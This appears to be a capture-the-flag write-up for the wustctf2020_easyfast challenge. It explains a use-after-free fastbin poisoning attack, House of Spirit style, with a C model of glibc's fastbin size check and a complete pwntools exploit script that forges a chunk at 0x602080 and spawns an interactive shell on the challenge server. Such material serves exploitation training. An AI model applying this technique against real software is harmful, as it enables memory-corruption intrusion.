BUU-wustctf2020_easyfast-WP

Posted on Jan 27, 2021

A simple fastbin attack problem, essentially House of Spirit.

The program has a UAF, so no double free is needed. Allocate two chunks and free both of them; because fastbins are LIFO, overwrite the fd pointer of the second chunk with 0x602080, then malloc twice to obtain an arbitrary write at 0x602090. Of course, when serving a request from a fastbin, malloc checks that the size of the chunk being returned matches the bin:

if (__builtin_expect (fastbin_index (chunksize (victim)) != idx, 0))
  {
    errstr = "malloc(): memory corruption (fast)";
  errout:
    malloc_printerr (check_action, errstr, chunk2mem (victim));
    return NULL;
  }

Since 0x602088 already holds p64(0x50), the chunk we request must be of size 0x40 so that the fake chunk's size field lands in the same fastbin index.
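To see exactly what that check enforces, here is an added example (not code from the original writeup or from glibc itself) that reimplements the relevant glibc macros and evaluates the size check for a given request size and a given size field. It assumes a 64-bit glibc 2.23-era layout: SIZE_SZ == 8, 16-byte alignment, and the three low bits of the size field used as flags; `fastbin_size_check_passes` is a hypothetical helper name.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>

/* Assumed 64-bit glibc constants (SIZE_SZ == 8, MALLOC_ALIGNMENT == 16). */
#define SIZE_SZ 8
#define MALLOC_ALIGN_MASK 15
#define MINSIZE 32
#define SIZE_BITS 7 /* PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA */

/* glibc's request2size: pad the user request with the header and round up to alignment. */
size_t request2size(size_t req)
{
    if (req + SIZE_SZ + MALLOC_ALIGN_MASK < MINSIZE)
        return MINSIZE;
    return (req + SIZE_SZ + MALLOC_ALIGN_MASK) & ~(size_t)MALLOC_ALIGN_MASK;
}

/* chunksize: strip the flag bits from the size field stored in the chunk header. */
size_t chunksize(size_t size_field)
{
    return size_field & ~(size_t)SIZE_BITS;
}

/* fastbin_index: which fastbin a chunk of this size belongs to (64-bit variant). */
unsigned fastbin_index(size_t sz)
{
    return (unsigned)(sz >> 4) - 2;
}

/*
 * Models the check quoted from _int_malloc above: the bin index computed from the
 * request must equal the bin index computed from the size field of the chunk that
 * the fastbin hands back. Returns true when malloc would accept the chunk.
 */
bool fastbin_size_check_passes(size_t request, size_t victim_size_field)
{
    unsigned idx = fastbin_index(request2size(request));
    return fastbin_index(chunksize(victim_size_field)) == idx;
}

int main(void)
{
    /* Constructed inputs: the size field 0x50 the writeup finds at 0x602088,
     * compared against a few request sizes. */
    size_t size_field = 0x50;
    size_t requests[] = { 24, 32, 56, 64, 72, 80 };
    for (size_t i = 0; i < sizeof requests / sizeof requests[0]; i++) {
        size_t req = requests[i];
        printf("malloc(%zu): chunk size 0x%zx, bin %u, size field 0x%zx -> %s\n",
               req, request2size(req), fastbin_index(request2size(req)), size_field,
               fastbin_size_check_passes(req, size_field) ? "accepted" : "memory corruption (fast)");
    }
    return 0;
}
```

The table it prints shows why the writeup requests 64: only requests whose padded size is exactly 0x50 (57 through 72 bytes) map to bin 3, the bin a size field of 0x50 belongs to; any other request size trips the `memory corruption (fast)` path. Because `chunksize` masks the flag bits, a size field of 0x51 passes just like 0x50.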

exp

#!/usr/bin/env python
# coding=utf-8
from pwn import *
context(log_level ="debug")

#sh = process("./wustctf2020_easyfast")
sh = remote("node3.buuoj.cn",26003)

# allocate two 0x40 chunks (0x50 with header), index 0 and 1
sh.sendlineafter("choice>\n","1")
sh.sendlineafter("size>\n","64")

sh.sendlineafter("choice>\n","1")
sh.sendlineafter("size>\n","64")

# free both; chunk 1 is now at the head of the 0x50 fastbin
sh.sendlineafter("choice>\n","2")
sh.sendlineafter("index>\n","0")

sh.sendlineafter("choice>\n","2")
sh.sendlineafter("index>\n","1")

# UAF: edit freed chunk 1 so its fd points at the fake chunk at 0x602080
sh.sendlineafter("choice>\n","3")
sh.sendlineafter("index>\n","1")
sh.send(p64(0x602080))

# first malloc returns chunk 1, second returns the fake chunk (index 3) at 0x602090
sh.sendlineafter("choice>\n","1")
sh.sendlineafter("size>\n","64")

sh.sendlineafter("choice>\n","1")
sh.sendlineafter("size>\n","64")

# write to 0x602090 through the fake chunk
sh.sendlineafter("choice>\n","3")
sh.sendlineafter("index>\n","3")
sh.send(p64(0))

sh.sendlineafter("choice>\n","4")
sh.interactive()